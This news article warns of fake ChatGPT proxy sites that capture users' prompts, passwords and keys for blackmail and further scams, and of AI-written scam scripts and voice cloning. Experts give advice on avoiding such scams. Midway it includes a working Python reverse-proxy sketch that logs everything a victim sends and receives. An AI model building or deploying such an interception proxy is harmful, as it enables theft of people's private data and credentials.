
ChatGPT proxy scam warning as fraudsters steal personal details to blackmail victims


Scammers are taking advantage of the popularity of ChatGPT to dupe people into handing over personal details.

Ray Canzanese, director of Netskope Threat Labs, explained how criminals create proxy imitations of the ChatGPT webpage, allowing them to see all the information a person inputs into the AI-powered service.

He said: “The proxy, which now acts as a ‘man-in-the-middle’ between the victim and ChatGPT, allows the scammer to see everything the victim sends to ChatGPT – and all the responses returned by ChatGPT.

“Scammers do this to collect information about their victims that can be used to target them with additional scams.

“Suppose I used ChatGPT to edit an email to my financial planner and to research a medical condition I was just diagnosed with.

“The scammer now knows my financial situation and can target me with scams that prey on my medical condition.”

Scammers can also use any potentially embarrassing personal details to try to blackmail a person into sending them money.

The fraudsters can also harvest any passwords or keys sent to ChatGPT through the proxy sites under their control.
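To show how little machinery such a scam needs, the sketch below is a bare-bones “man-in-the-middle” reverse proxy in Python. It is purely illustrative and assumed for this article, not code from Netskope’s report: the Flask framework, the function name and the upstream address are all stand-ins. The proxy relays each request to the real service and quietly logs both the prompt and the reply, which is exactly the visibility Mr Canzanese describes.

```python
# Illustrative sketch only: a minimal "man-in-the-middle" reverse proxy.
# The framework choice (Flask) and the upstream address are assumptions,
# not details taken from Netskope's report.
from flask import Flask, Response, request
import requests

app = Flask(__name__)
UPSTREAM = "https://chat.example.com"  # hypothetical stand-in for the genuine service

@app.route("/", defaults={"path": ""}, methods=["GET", "POST"])
@app.route("/<path:path>", methods=["GET", "POST"])
def relay(path):
    # The proxy operator sees the full request body (the victim's prompt)...
    print("victim sent:", request.get_data(as_text=True))
    upstream = requests.request(
        method=request.method,
        url=f"{UPSTREAM}/{path}",
        headers={k: v for k, v in request.headers if k.lower() != "host"},
        data=request.get_data(),
    )
    # ...and the full response (everything the service sends back) before
    # relaying it on, so the page still works as the victim expects.
    print("service replied:", upstream.text[:200])
    return Response(upstream.content, status=upstream.status_code)

if __name__ == "__main__":
    app.run(port=8080)
```

Because the genuine service still answers, the page behaves normally from the victim’s side, which is why the address bar is the only reliable tell.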

Mr Canzanese spoke about what people can do to avoid being taken in by the fake websites.

He said: “The approach is very similar to recognising phishing pages. ChatGPT is a product of OpenAI and the URL is chat.openai.com.

“If the page you visited has a different URL, it may be a scam. To avoid such scams, always browse directly to websites.

“Do not click on links that you receive via text message, email, or social media. Do not click on links in ads.”
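That advice boils down to an exact hostname comparison. As a minimal sketch (the helper function name here is hypothetical), a link passes only if its hostname is precisely chat.openai.com:

```python
# Hypothetical helper illustrating the exact-hostname check described above.
from urllib.parse import urlparse

def is_genuine_chatgpt_url(url: str) -> bool:
    host = urlparse(url).hostname or ""
    # Only an exact match passes; look-alikes such as
    # "chat.openai.com.evil.example" or "chat-openai.com" do not.
    return host == "chat.openai.com"

print(is_genuine_chatgpt_url("https://chat.openai.com/"))             # True
print(is_genuine_chatgpt_url("https://chat.openai.com.evil.example")) # False
```

Addresses that merely contain the real name somewhere in them fail this check, and should be treated as suspect.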


There is also a danger that AI tools such as ChatGPT could be used by scammers to spread their ploys more widely and make them more convincing.

Chris Vaughan, vice president of Technical Account Management at cybersecurity group Tanium, said ChatGPT can be used to write “convincing scripts” for scam phone calls.

He also said AI can be used to clone a person’s voice and imitate them during a phone call.

He explained: “AI technology can mimic your voice and replicate mannerisms with only 15 minutes of audio recording, making it indistinguishable from the real person.

“Imagine hearing a distressed relative’s voice through the phone, asking you to transfer them money.

“Adding a personal touch to scams has the potential to significantly increase the number of victims.”

Fortunately, there are steps people can take to protect themselves against scam calls pretending to be from an organisation or from a loved one in need.

Mr Vaughan said: “Listen for unnatural pauses or a distorted voice quality. These can be signs of pre-recorded messages or voice synthesis software.

“If you hear these red flags, don’t be afraid to hang up – don’t stick around if it’s suspicious.”

Fraudsters can also use AI to create fake social media profiles that can look very convincing.



